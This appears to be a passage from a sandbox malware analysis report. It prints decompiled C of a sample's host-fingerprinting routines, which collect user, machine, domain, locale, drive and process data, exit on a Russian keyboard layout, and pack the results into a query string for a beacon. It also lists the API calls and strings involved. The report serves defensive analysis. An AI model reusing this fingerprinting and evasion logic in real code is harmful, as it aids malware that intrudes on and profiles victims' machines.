									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F9D6E90(_t154);
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf9df348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t270 = GetDriveTypeW( &_v40);
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F9D8950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F9D8950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76);
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F9D7A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F9D79EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12);
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000);
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F9D72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}



























































                                        0x0f9d7330
                                        0x0f9d7330
                                        0x0f9d733b
                                        0x0f9d7347
                                        0x0f9d7357
                                        0x0f9d7359
                                        0x0f9d735c
                                        0x0f9d7361
                                        0x0f9d7368
                                        0x0f9d7368
                                        0x0f9d7372
                                        0x0f9d737f
                                        0x0f9d7386
                                        0x0f9d7388
                                        0x0f9d738b
                                        0x0f9d7390
                                        0x0f9d7390
                                        0x0f9d73a0
                                        0x0f9d73f6
                                        0x0f9d73fa
                                        0x0f9d7495
                                        0x0f9d7499
                                        0x0f9d7599
                                        0x0f9d759d
                                        0x0f9d75ad
                                        0x0f9d75af
                                        0x0f9d75c5
                                        0x0f9d75cf
                                        0x0f9d75d1
                                        0x0f9d75e9
                                        0x0f9d75f6
                                        0x0f9d75f8
                                        0x0f9d75f8
                                        0x0f9d75cf
                                        0x0f9d75ff
                                        0x0f9d766e
                                        0x0f9d7672
                                        0x0f9d7677
                                        0x0f9d7683
                                        0x0f9d768a
                                        0x0f9d768c
                                        0x0f9d768c
                                        0x0f9d768a
                                        0x0f9d7693
                                        0x0f9d76a7
                                        0x0f9d76b7
                                        0x0f9d76ba
                                        0x0f9d76bc
                                        0x0f9d76c4
                                        0x0f9d76cc
                                        0x0f9d76cc
                                        0x0f9d76d7
                                        0x0f9d76db
                                        0x0f9d76e2
                                        0x0f9d76e9
                                        0x0f9d76f6
                                        0x0f9d76fe
                                        0x0f9d7704
                                        0x0f9d770a
                                        0x0f9d770a
                                        0x0f9d7720
                                        0x0f9d7727
                                        0x0f9d7729
                                        0x0f9d7730
                                        0x0f9d7736
                                        0x0f9d7736
                                        0x0f9d773c
                                        0x0f9d7755
                                        0x0f9d7755
                                        0x0f9d7768
                                        0x0f9d7770
                                        0x0f9d7776
                                        0x0f9d777d
                                        0x0f9d7790
                                        0x0f9d7796
                                        0x0f9d779b
                                        0x0f9d77b9
                                        0x0f9d779d
                                        0x0f9d77b4
                                        0x0f9d77b4
                                        0x0f9d77ce
                                        0x0f9d77d1
                                        0x0f9d77d1
                                        0x0f9d77e3
                                        0x0f9d7992
                                        0x0f9d7999
                                        0x0f9d79e2
                                        0x0f9d79eb
                                        0x0f9d79eb
                                        0x0f9d79a9
                                        0x0f9d79af
                                        0x0f9d79b7
                                        0x0f9d79d6
                                        0x0f9d79d6
                                        0x00000000
                                        0x0f9d79d6
                                        0x0f9d79b9
                                        0x0f9d79bb
                                        0x0f9d79c2
                                        0x00000000
                                        0x00000000
                                        0x0f9d79d0
                                        0x00000000
                                        0x0f9d77e9
                                        0x0f9d77f7
                                        0x0f9d77fe
                                        0x0f9d7805
                                        0x0f9d780c
                                        0x0f9d7813
                                        0x0f9d781a
                                        0x0f9d7821
                                        0x0f9d782e
                                        0x0f9d7831
                                        0x0f9d7834
                                        0x0f9d7840
                                        0x0f9d7840
                                        0x0f9d7843
                                        0x0f9d7846
                                        0x0f9d7847
                                        0x0f9d784d
                                        0x0f9d7852
                                        0x0f9d7855
                                        0x0f9d785a
                                        0x0f9d785d
                                        0x0f9d785f
                                        0x0f9d7862
                                        0x0f9d7867
                                        0x0f9d7875
                                        0x0f9d787a
                                        0x0f9d788b
                                        0x0f9d7896
                                        0x0f9d78a4
                                        0x0f9d78a8
                                        0x0f9d78b2
                                        0x0f9d78d0
                                        0x0f9d796b
                                        0x00000000
                                        0x0f9d796b
                                        0x0f9d78f2
                                        0x0f9d78f5
                                        0x0f9d78f7
                                        0x0f9d78fc
                                        0x0f9d7908
                                        0x0f9d790b
                                        0x0f9d790d
                                        0x0f9d7910
                                        0x0f9d7919
                                        0x0f9d792a
                                        0x0f9d7938
                                        0x0f9d793a
                                        0x0f9d794c
                                        0x0f9d7954
                                        0x0f9d795f
                                        0x0f9d795f
                                        0x0f9d7976
                                        0x0f9d7977
                                        0x0f9d797a
                                        0x0f9d7986
                                        0x0f9d7988
                                        0x0f9d798d
                                        0x00000000
                                        0x0f9d798d
                                        0x0f9d7601
                                        0x0f9d7605
                                        0x0f9d7616
                                        0x0f9d7618
                                        0x0f9d761c
                                        0x0f9d7622
                                        0x0f9d7663
                                        0x0f9d7663
                                        0x0f9d7668
                                        0x0f9d7669
                                        0x0f9d766b
                                        0x00000000
                                        0x0f9d766b
                                        0x0f9d7624
                                        0x0f9d762b
                                        0x00000000
                                        0x0f9d765c
                                        0x00000000
                                        0x00000000
                                        0x0f9d764e
                                        0x00000000
                                        0x00000000
                                        0x0f9d7655
                                        0x00000000
                                        0x00000000
                                        0x0f9d7647
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d762b
                                        0x0f9d75ff
                                        0x0f9d74ad
                                        0x0f9d74b6
                                        0x0f9d74c0
                                        0x0f9d74c5
                                        0x0f9d74c8
                                        0x0f9d74cd
                                        0x0f9d74d4
                                        0x0f9d74dd
                                        0x0f9d74df
                                        0x0f9d74e2
                                        0x0f9d74ec
                                        0x0f9d7507
                                        0x0f9d7564
                                        0x0f9d7564
                                        0x0f9d7566
                                        0x00000000
                                        0x0f9d7566
                                        0x0f9d750c
                                        0x0f9d7529
                                        0x0f9d7534
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d753d
                                        0x0f9d7547
                                        0x00000000
                                        0x0f9d7549
                                        0x0f9d7559
                                        0x0f9d763a
                                        0x0f9d763c
                                        0x0f9d7641
                                        0x0f9d7641
                                        0x0f9d755f
                                        0x0f9d755f
                                        0x0f9d7569
                                        0x0f9d7569
                                        0x0f9d757e
                                        0x0f9d7580
                                        0x0f9d758d
                                        0x00000000
                                        0x0f9d7593
                                        0x0f9d740e
                                        0x0f9d7410
                                        0x0f9d7413
                                        0x0f9d742b
                                        0x0f9d743a
                                        0x0f9d747e
                                        0x0f9d7488
                                        0x0f9d748f
                                        0x00000000
                                        0x0f9d748f
                                        0x0f9d743f
                                        0x0f9d745e
                                        0x0f9d7469
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7472
                                        0x0f9d747c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d73a2
                                        0x0f9d73b0
                                        0x0f9d73b2
                                        0x0f9d73b7
                                        0x00000000
                                        0x00000000
                                        0x0f9d73b9
                                        0x0f9d73cf
                                        0x0f9d73d6
                                        0x0f9d73f1
                                        0x0f9d73f1
                                        0x0f9d73f3
                                        0x00000000
                                        0x0f9d73f3
                                        0x0f9d73d8
                                        0x0f9d73df
                                        0x00000000
                                        0x00000000
                                        0x0f9d73f1
                                        0x00000000
                                        0x0f9d73f1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                        • GetComputerNameW.KERNEL32 ref: 0F9D7390
                                        • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                        • wsprintfW.USER32 ref: 0F9D73F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                        • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                        • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                        • GetLastError.KERNEL32 ref: 0F9D7469
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F9D74AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D74C3
                                        • wsprintfW.USER32 ref: 0F9D74DD
                                        • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F9D74FF
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0F9D4640,?), ref: 0F9D7521
                                        • GetLastError.KERNEL32 ref: 0F9D7534
                                        • RegCloseKey.ADVAPI32(?), ref: 0F9D753D
                                        • lstrcmpiW.KERNEL32(0F9D4640,00000419), ref: 0F9D7551
                                        • wsprintfW.USER32 ref: 0F9D757E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F9D75AD
                                        • wsprintfW.USER32 ref: 0F9D75F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0F9D7605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F9D7616
                                        • wsprintfW.USER32 ref: 0F9D763A
                                        • ExitProcess.KERNEL32 ref: 0F9D7641
                                        • wsprintfW.USER32 ref: 0F9D7669
                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F9D76A7
                                        • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F9D76BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D76C4
                                        • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F9D76FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7730
                                        • wsprintfW.USER32 ref: 0F9D7768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0F9D777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F9D7789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0F9D7790
                                        • lstrlenW.KERNEL32(?), ref: 0F9D77A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F9D77D1
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                          • Part of subcall function 0F9D7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                          • Part of subcall function 0F9D7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D7828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7896
                                        • lstrcatW.KERNEL32(?,0F9E029C), ref: 0F9D78A8
                                        • lstrcatW.KERNEL32(?,0F9E0310), ref: 0F9D78B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0F9D4640,?,00000000), ref: 0F9D78C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0F9D4640,00000000,00000000,00000000,0F9D4640,00000000), ref: 0F9D7910
                                        • wsprintfW.USER32 ref: 0F9D792A
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7938
                                        • wsprintfW.USER32 ref: 0F9D794C
                                        • lstrcatW.KERNEL32(?,0F9E0330), ref: 0F9D795F
                                        • lstrcatW.KERNEL32(?,0F9E0334), ref: 0F9D796B
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F9D79A9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0F9D79D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction ID: 87f46a052380e17a54fa27737a3d91d83e7b1d83710cb35672e6a63a3a4e77ad
                                        • Opcode Fuzzy Hash: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction Fuzzy Hash: C112BE70A40305AFEB218FA0CC46FAEBBB8FF44705F208518F741A61E2D7B5A964CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D6F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}







                                        0x0f9d6f44
                                        0x0f9d6f47
                                        0x0f9d6f58
                                        0x0f9d6f61
                                        0x0f9d6f69
                                        0x0f9d6f72
                                        0x0f9d6f7a
                                        0x0f9d6f7a
                                        0x0f9d6f7f
                                        0x0f9d6f85
                                        0x0f9d6f8d
                                        0x0f9d6f93
                                        0x0f9d6f9b
                                        0x0f9d6f9b
                                        0x0f9d6fa1
                                        0x0f9d6fa7
                                        0x0f9d6faf
                                        0x0f9d6fb5
                                        0x0f9d6fbd
                                        0x0f9d6fbd
                                        0x0f9d6fc3
                                        0x0f9d6fc9
                                        0x0f9d6fd1
                                        0x0f9d6fd7
                                        0x0f9d6fdf
                                        0x0f9d6fdf
                                        0x0f9d6fe5
                                        0x0f9d6feb
                                        0x0f9d6ff3
                                        0x0f9d6ff9
                                        0x0f9d7001
                                        0x0f9d7001
                                        0x0f9d7007
                                        0x0f9d700d
                                        0x0f9d7015
                                        0x0f9d701b
                                        0x0f9d7023
                                        0x0f9d7023
                                        0x0f9d7029
                                        0x0f9d702f
                                        0x0f9d7037
                                        0x0f9d703d
                                        0x0f9d7045
                                        0x0f9d7045
                                        0x0f9d704b
                                        0x0f9d7051
                                        0x0f9d7059
                                        0x0f9d705f
                                        0x0f9d7067
                                        0x0f9d7067
                                        0x0f9d706d
                                        0x0f9d7073
                                        0x0f9d707b
                                        0x0f9d7081
                                        0x0f9d7089
                                        0x0f9d7089
                                        0x0f9d708f
                                        0x0f9d709c
                                        0x0f9d70a2
                                        0x0f9d70a5
                                        0x0f9d70aa
                                        0x0f9d70c7
                                        0x0f9d70ac
                                        0x0f9d70b6
                                        0x0f9d70bc
                                        0x0f9d70d4
                                        0x0f9d70dc
                                        0x0f9d70e2
                                        0x0f9d70ea
                                        0x0f9d70f6
                                        0x0f9d70f6
                                        0x0f9d7100
                                        0x0f9d7106
                                        0x0f9d710e
                                        0x0f9d7114
                                        0x0f9d711c
                                        0x0f9d711c
                                        0x0f9d7128
                                        0x0f9d7132

                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F61
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F72
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F85
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F93
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FA7
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FB5
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FC9
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FD7
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FEB
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FF9
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7001
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D700D
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7015
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D701B
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7023
                                        • lstrcatW.KERNEL32(?,0F9D4966), ref: 0F9D702F
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7037
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D703D
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7045
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7051
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7059
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D705F
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7067
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7073
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7081
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7089
                                        • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F9D709C
                                        • wsprintfW.USER32 ref: 0F9D70B6
                                        • wsprintfW.USER32 ref: 0F9D70C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70D4
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D70DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70E2
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D70EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F9D70F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7106
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7114
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
